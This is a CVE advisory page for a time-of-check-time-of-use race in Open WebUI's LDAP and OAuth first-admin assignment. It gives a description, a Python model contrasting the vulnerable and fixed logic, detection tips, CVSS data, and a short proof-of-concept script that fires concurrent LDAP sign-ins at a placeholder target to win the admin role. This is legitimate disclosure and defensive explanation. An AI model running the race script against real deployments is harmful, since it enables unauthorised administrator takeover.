Security Vulnerability Report
CVE-2026-45675 CVSS 8.1 HIGH

CVE-2026-45675

Published: 2026-05-15 20:16:49
Last Modified: 2026-05-15 21:16:39

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the LDAP and OAuth authentication flows use a TOCTOU (Time-of-Check-Time-of-Use) pattern for first-user admin role assignment. The regular signup handler (signup_handler in auths.py, line 663) was explicitly patched to prevent this race with the comment "Insert with default role first to avoid TOCTOU race", but the LDAP and OAuth code paths were never updated with the same fix. This vulnerability is fixed in 0.9.0.
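The pattern behind this advisory is a check ("is the user table empty, so this login should become admin?") that is separated from the write that depends on it. The following is an added illustration, not Open WebUI's code: it models the users table with a small in-memory store whose lock stands in for the database serialising one write statement or transaction (an assumption of this demo), and uses a barrier to force every concurrent first login to observe an empty table. The vulnerable handler checks first and inserts later; the hardened handler decides the role inside the same atomic write, which is the shape of the "insert with default role first" fix the description refers to. Names such as UserStore, vulnerable_signup and fixed_signup are invented for this example.

```python
import threading
from dataclasses import dataclass, field


@dataclass
class UserStore:
    """Stand-in for the users table (constructed for this demo).

    The lock models the database's serialisation of a single statement or
    transaction; it is NOT held across separate calls, just as a real
    SELECT COUNT(*) followed by a separate INSERT are two independent writes.
    """
    users: dict = field(default_factory=dict)   # name -> role
    lock: threading.Lock = field(default_factory=threading.Lock)

    def count(self) -> int:
        with self.lock:
            return len(self.users)

    def insert(self, name: str, role: str) -> None:
        with self.lock:
            self.users[name] = role

    def insert_first_user_as_admin(self, name: str) -> str:
        # Check and insert are one atomic unit: the SQL equivalent is a single
        # INSERT whose role is computed inside the same statement/transaction,
        # or inserting with a default role and promoting under the same lock.
        with self.lock:
            role = "admin" if not self.users else "pending"
            self.users[name] = role
            return role


def vulnerable_signup(store: UserStore, name: str, barrier: threading.Barrier) -> str:
    """TOCTOU: the 'am I the first user?' check is separate from the insert."""
    is_first = store.count() == 0     # time of check: every racer sees 0
    barrier.wait()                    # all racers pass the check before any insert
    role = "admin" if is_first else "pending"
    store.insert(name, role)          # time of use: stale decision is written
    return role


def fixed_signup(store: UserStore, name: str, barrier: threading.Barrier) -> str:
    """Same interleaving pressure, but check and insert are atomic."""
    barrier.wait()
    return store.insert_first_user_as_admin(name)


def run_race(handler, n: int = 5) -> list:
    """Run n concurrent first logins through `handler`; return the roles assigned."""
    store = UserStore()
    barrier = threading.Barrier(n)
    threads = [
        threading.Thread(target=handler, args=(store, f"user{i}", barrier))
        for i in range(n)
    ]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sorted(store.users.values())


def admin_count(handler, n: int = 5) -> int:
    """Number of admin accounts created by n racing first logins."""
    return run_race(handler, n).count("admin")


if __name__ == "__main__":
    print("vulnerable handler admins:", admin_count(vulnerable_signup))  # 5
    print("fixed handler admins:     ", admin_count(fixed_signup))       # 1
```

The detection angle follows directly from the model: more than one account with the admin role whose creation timestamps are within the same second, or any admin created through an LDAP/OAuth path after a first admin already existed, is a signal worth alerting on in an affected version.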

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import threading

# Target URL (Example)
url = "http://target-open-webui.com/api/v1/auths/signin/ldap"
payload = {
    "username": "attacker",
    "password": "password123"
}

def make_request():
    try:
        response = requests.post(url, json=payload)
        print(f"Status: {response.status_code}, Response: {response.text}")
    except Exception as e:
        print(e)

# Simulate Race Condition
threads = []
for i in range(10):
    t = threading.Thread(target=make_request)
    threads.append(t)
    t.start()

for t in threads:
    t.join()

References

https://github.com/open-webui/open-webui/commit/96a0b3239b1aadb23fc359bf10849c9ba12fd6ec
https://github.com/open-webui/open-webui/pull/23626
https://github.com/open-webui/open-webui/security/advisories/GHSA-h3ww-q6xx-w7x3

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45675", "sourceIdentifier": "[email protected]", "published": "2026-05-15T20:16:49.220", "lastModified": "2026-05-15T21:16:38.647", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, he LDAP and OAuth authentication flows use a TOCTOU (Time-of-Check-Time-of-Use) pattern for first-user admin role assignment. The regular signup handler (signup_handler in auths.py, line 663) was explicitly patched to prevent this race with the comment \"Insert with default role first to avoid TOCTOU race\", but the LDAP and OAuth code paths were never updated with the same fix. This vulnerability is fixed in 0.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}, {"lang": "en", "value": "CWE-362"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/commit/96a0b3239b1aadb23fc359bf10849c9ba12fd6ec", "source": "[email protected]"}, {"url": "https://github.com/open-webui/open-webui/pull/23626", "source": "[email protected]"}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-h3ww-q6xx-w7x3", "source": "[email protected]"}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-h3ww-q6xx-w7x3", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}